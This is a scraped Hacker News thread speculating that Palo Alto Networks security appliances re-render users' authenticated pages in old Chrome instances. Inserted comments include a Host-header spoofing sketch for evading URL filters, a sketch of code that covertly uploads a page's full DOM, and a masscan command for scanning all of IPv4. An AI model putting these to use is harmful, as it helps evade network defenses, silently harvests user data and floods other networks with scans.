I found a few leads googling around Palo Alto Networks docs website:
- "Advanced URL Filtering" seems to have a feature where web content can either be evaluated "inline" or "web payload data is also submitted to Advanced URL Filtering in the cloud" [1].
- If a URL is considered 2 spooky to load on the user's endpoint, it can instead be loaded via "Remote Browser Isolation" in a remote-desktop-like session, on demand, for that single page only [2].
I think either (or both) could explain the signals you're detecting.
Ex-PANW here. It's almost certainly the firewall's URL Filtering feature (aka PAN-DB).
When someone makes an HTTP request, the firewall takes the host and path from the request and looks them up first in a local cache on the data plane, then in the cloud. (As you can imagine, bypassing the entire feature is therefore trivial for malware. You just open a connection to an arbitrary IP address and put, say, google.com in the host header. As far as the firewall can tell, you are in fact talking to google.com.)
When the URL isn't already known to the cloud, or hasn't been visited more recently than its TTL, it goes into a queue to be refreshed by the crawler, which will make its way there shortly thereafter to classify the page.
Palo Alto has other URL scanners, but none that would reliably visit the page after the user. URLs carved out of SMTP traffic, for example, would mostly be visited before the real user, not after.
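To make the bypass described above concrete, here is a minimal sketch (the host and IP values are arbitrary placeholders, not anything from the article): the client connects to whatever IP it likes, but presents a benign hostname in the Host header, which is all a host/path-based filter ever sees.

```typescript
// Sketch of the bypass described above (illustrative only; google.com
// and the target IP are arbitrary). A host/path-based filter classifies
// this request as a visit to google.com, even though the TCP connection
// goes to a completely unrelated IP address.
function buildSpoofedRequest(fakeHost: string, path: string): string {
  return [
    `GET ${path} HTTP/1.1`,
    `Host: ${fakeHost}`, // the only "URL" the filter ever sees
    "Connection: close",
    "",
    "",
  ].join("\r\n");
}

// To send it, open a plain TCP socket to the arbitrary IP, e.g. with
// Node's net.connect(80, "203.0.113.7"), and write the request verbatim.
// (203.0.113.7 is a documentation-range placeholder address.)
```

Nothing here requires malware sophistication, which is the point: the filter trusts metadata the client fully controls.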
I remember setting up a Confluence server which was only used by me, but had public access (still password protected).
When checking the logs, I noticed an external IP trying to access pages which I had accessed previously, but they got redirected to the log-in page. The paths were very specific, some of which I had bookmarked, so it was clear that there was an extension logging my browsing, and some server or person then tried to access my pages.
> Dec. 28, 2023 Palo Alto Networks .. announced that it has completed the acquisition of Talon Cyber Security, a pioneer of enterprise browser technology ... Talon's Enterprise Browser will provide additional layers of protection against phishing attacks, web-based attacks and malicious browser extensions. Talon also offers extensive controls to help ensure that sensitive data does not escape the confines of the browser.
Set hyper-granular policies ... boundaries across all users, devices, apps, networks, locations, & assets
Log any and all browser behavior, review screenshots of critical actions, & trace incidents down to the click
Critical security tools embedded into the browser: like native browser isolation, automatic phishing protection, & web filtering
The usual way is to require a custom CA for all clients; it sounds like an ineffective setup if you can just ignore it. I.e., it should be an intermediate certificate for the proxy that you need to acknowledge.
It could be a chat preview generator. Users DM links to some internal project pages in a chat tool, and the tool fetches the page in the background in an attempt to render a preview.
That was on my list of candidates as well! Those usually have a specific user agent making it clear what they are, they appear from a company's netblock (e.g. Facebook, Microsoft), and they cannot access authed pages (unless the key is in the URL).
In this case these appeared to all be MitM'ed pages from a security device, since the key wasn't in the URL and the pages contained user IDs for a specific user.
In that case, the preview system would do (e.g.) GET https://example.com/private/page, but get a 401 Unauthorized response back, and would have none of the page content, nor execute any of the scripts included in that /private/page:
> * That somehow had the page content from a user
> * Would render and execute all scripts on that page as if it was that user
Same thing happened with my work computer on the office network with a MITM HTTPS firewall. The IP address jumps between the coasts randomly, confusing the Windows weather widget. Images fail to load on a lot of websites because the IP address change triggers something in their CDN. Everything works fine when I'm WFHing, so it has to be the office network.
Oh, and this can also happen when a mobile user jumps off their home wifi network to an internationally roaming data card. Why would they do that? Because data is cheaper that way, or they are actually tourists. So please do not block users just because they are doing this teleportation dance.
My mail provider locked my account after I used the satellite internet on an intercontinental flight (my IP location must have bounced all over). Got a serious scare later at my hotel since pretty much all of my itinerary plans and details were kept there.
Thankfully that could be resolved, but it wasn't a great way to start a vacation.
Some other code running in the browser window (probably a browser extension, but possibly another script tag in the page, inserted by an intermediate firewall/proxy) is doing this. It could be corporate spyware (i.e. forced on users by the IT department), or an extension that only tends to be used by large institutions (because it relates to some expensive enterprise product). Alternatively, it could be a much more popular browser extension, but it only executes this capture when it determines that the user is within a target list of large institutions.
I'm making the same guess as the author about the execution process: that the code is shipping a huge amount of page content to a cloud server, e.g. the full DOM, and then rendering that DOM in this older Chrome version. It's not fetching the same page from the origin server, which is how it's able to do this without auth cookies.
As part of rendering, the page's script tags all get executed again, which is why Upollo is seeing this. (Note that I don't know if this re-execution of script tags is deliberate. There's a good chance that it's an unintended side-effect of loading the DOM into Chrome, but it doesn't seem to break anything so nobody's bothered to disable it.)
It's only sampling a small percentage of executions, which is why it's not continually happening for every interaction by these users.
It's waiting ten seconds so that the page's network interactions are likely to have finished by then. Waiting longer would increase the odds of the user navigating to another page before the code has had a chance to run.
The article doesn't say if there are particular kinds of pages being grabbed, but looking for commonality between them would help.
The main thing that stumps me – assuming I've understood it correctly – is why the second render is happening across such a diverse set of cloud networks.
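If this guess is right, the client side could be as small as the following sketch. To be clear, everything here is assumed (SAMPLE_RATE, the callback names, the collector URL in the comments are my inventions); it only illustrates the observed pattern: sample a small fraction of page loads, wait about ten seconds, serialize the DOM, and ship it out.

```typescript
const SAMPLE_RATE = 0.01;        // assumed: only a small fraction of loads
const CAPTURE_DELAY_MS = 10_000; // matches the observed ~10 second delay

// Pure decision: capture only when a random draw falls under the rate.
function shouldCapture(draw: number, rate: number = SAMPLE_RATE): boolean {
  return draw < rate;
}

// DOM access and upload are injected so the sketch runs outside a browser.
// In a real extension this would be:
//   getDom = () => document.documentElement.outerHTML
//   send   = body => fetch(collectorUrl, { method: "POST", body })
function scheduleCapture(
  getDom: () => string,
  send: (body: string) => void,
  draw: number = Math.random(),
): void {
  if (!shouldCapture(draw)) return; // usually: do nothing at all
  // Wait for the page's own network activity to settle before serializing.
  setTimeout(() => send(getDom()), CAPTURE_DELAY_MS);
}
```

The server side would then feed the uploaded HTML into its own (older) Chrome, which re-executes the page's script tags, producing exactly the second execution being observed, without needing any auth cookies.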
A browser extension is what we originally thought, for exactly the same reasons you did. We then started to see some requests show up from iOS devices, which didn't support extensions, so that made us think MitM corporate proxies.
The diversity of cloud networks looks to be due to these being deployed by individual institutions (e.g. universities, corporations, etc.) rather than only run from Palo Alto Networks' data centers.
We also saw slightly different configurations with different browser versions, but with the same pattern of behaviour.
"Palo Alto Networks" is something that shows up more clearly than anything else in my lighttpd logs, as they include a "we're Palo Alto Networks doing research, contact us here (email) for us not to scan" note in their HTTP request headers. They appear to do a full IPv4 range scan many times a day, IIRC.
Funnily enough, I got motivated to try to make my crawler show up the same way in my own server logs through sheer scan breadth, i.e. by hitting so many servers that I'd see my own crawler in the logs without any kind of targeting. A kind of "planetary level experiment" born of curiosity.
Had to tweak masscan settings till my crappy router could keep up with the routing load. Ended up with something like 500 addresses/sec, which pales in comparison to the best hardware used for this, which, combined with masscan, scans the IPv4 space in 6 minutes.
Managed to scan 1% of the IPv4 space while I slept before I started to get seriously throttled and got a quite angry email from my ISP. Just told them "Oh thanks for noticing, I've now fixed the offending device" (pressed Ctrl+C) and never ran the scan again lol.
Ran the scan with masscan with no blacklist. Don't recommend that, at least not more than once, unless you get a good blacklist to follow.
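For reference, a rate-limited masscan run along these lines might look like the following (the filenames are placeholders, not from the comment above):

```shell
# Scan port 80 across all of IPv4 at ~500 packets/sec.
# exclude.conf is a placeholder exclusion list (the "blacklist" above);
# -oL writes results in masscan's simple list format.
masscan 0.0.0.0/0 -p80 --rate 500 --excludefile exclude.conf -oL results.txt
```

The `--rate` flag is what keeps a home router (and your ISP) from melting down; without `--excludefile` you will hit networks that actively complain.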
> This is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.
Aren't there systems where a server does the browsing and/or page rendering but it's controlled by terminals using other protocols?
Just speculatively, if someone was managing the setup of a room full of NSA analysts browsing for OSINT, how would they cover their tracks? What would that traffic look like?
It would look much like any other institution full of people doing general web browsing. A university full of foreign students googling stuff in their home languages. A hospital full of patients googling about random stuff. An airport full of international passengers surfing twitter feeds for war news.
Sounds like it could easily be the Cisco Umbrella junk that a few gov/universities I've seen have had. They install MITM CAs [0] on managed hardware, so they can definitely see page content.
It appears this is to find threats that might not otherwise have triggered, or to work out if particular sites are dangerous, without monitoring a user's machine.
It is scary that, for people in a corporate environment, this could be rendering banking, messaging, or any other page's contents.
I spoke with a Palo Alto vendor rep a few months ago. We were talking about the features of the firewall appliance one of my clients was using.
They have a feature that effectively "tests" what the user is about to load in a virtual environment, and sees if that content behaves abnormally. I forgot what they called it. It sounds like this could be it.
Could it be a "read it later" type of article reader/storage service? I know of at least one that fits the bill in that it uploads locally-viewed HTML to a server which then renders that page in a headless Chrome instance for archival:
I've recently been wondering how Omnivore, unlike e.g. Pocket, is able to store paywalled content (for which I have a subscription) on iOS when saving it via the Omnivore app target in the share sheet, but not when directly pasting the target URL in the webapp or iOS app.
Turns out that sharing to an iOS app actually enables [1] the app to run JavaScript in the Safari web context of the displayed page, including cookies and everything!
If I'm skimming the client and server source code correctly, it does just that: It seems to serialize and upload the HTML of the page [2] and then invokes Puppeteer on the server [3]. Puppeteer is a scriptable/headless Chrome – that would fit the bill of "an outdated Chrome running in a data center"!
Omnivore can also be self-hosted since both client and server are open-source; that would explain you seeing multiple data center IPs.
I wonder if this could be iCloud Private Relay? It appears that it's effectively a VPN with some redirection layers that change often, though I don't know the exact details.
What's happening is that some MitM Palo Alto Networks system is intercepting the HTML contents of the page, waiting a bit, and then rendering that HTML content again in an old Chrome on a separate machine. It's as if you went to an authenticated page that only you can see, like https://news.ycombinator.com/flagged?id=aaron695, did "View Source", copied and pasted that source into an HTML file, sent me the file, and I opened it on my computer.
jitl|2 years ago
[1]: https://docs.paloaltonetworks.com/advanced-url-filtering/adm....
[2]: https://docs.paloaltonetworks.com/advanced-url-filtering/adm...
caydenm|2 years ago
FreakLegion|2 years ago
lxgr|2 years ago
qwertox|2 years ago
transpute|2 years ago
https://www.paloaltonetworks.com/company/press/2023/palo-alt...
https://www.island.io/product
runlevel1|2 years ago
Well that definitely tracks.
m463|2 years ago
My machine wanted me to accept a client certificate from Palo Alto Networks.
I did not and kept refusing.
I think they had some sort of intrusive mitm proxy that filtered everything everyone was doing/browsing.
pastage|2 years ago
bloody-crow|2 years ago
caydenm|2 years ago
jitl|2 years ago
gaudat|2 years ago
ginko|2 years ago
yoz|2 years ago
caydenm|2 years ago
maxlin|2 years ago
internetter|2 years ago
Absolutely insane
Sporktacular|2 years ago
sandworm101|2 years ago
pbnjay|2 years ago
[0] https://docs.umbrella.com/deployment-umbrella/docs/install-c...
Edited to add link to docs.
mattmmatthews|2 years ago
caydenm|2 years ago
koliber|2 years ago
teekert|2 years ago
[0] https://en.wikipedia.org/wiki/Genesis_Market
admaiora|2 years ago
Maybe related somehow to that?
gmerc|2 years ago
nsonha|2 years ago
I don't know where the "security" bit comes from, but this is, to me, obviously web scraping.
matt3210|2 years ago
lxgr|2 years ago
[1] https://developer.apple.com/library/archive/documentation/Ge...
[2] https://github.com/omnivore-app/omnivore/blob/main/apple/Sou...
[3] https://github.com/omnivore-app/omnivore/blob/57aca545388904...
mholm|2 years ago
jitl|2 years ago
> But wait, these are different devices, they have none of the same cookies. If this were a VPN it would be the same device.
rompledorph|2 years ago
nextlevelwizard|2 years ago
Could be interesting, but I can't read this shit with flashing images.
dag11|2 years ago
cypherpunks01|2 years ago
caydenm|2 years ago
farkanoid|2 years ago
vitiral|2 years ago
pronouncedjerry|2 years ago
aaron695|2 years ago
> strange devices show up for some of our customers' users
> how did it load these pages which were often behind an authwall without ever logging in or having auth cookies?
Either
- The customer has screwed up user auth big time and some X knows that... let's go with no
- OP's data is wrong or they are reading it wrong
- They are explaining it badly.
jitl|2 years ago
jagged-chisel|2 years ago
meepmorp|2 years ago
FreeFull|2 years ago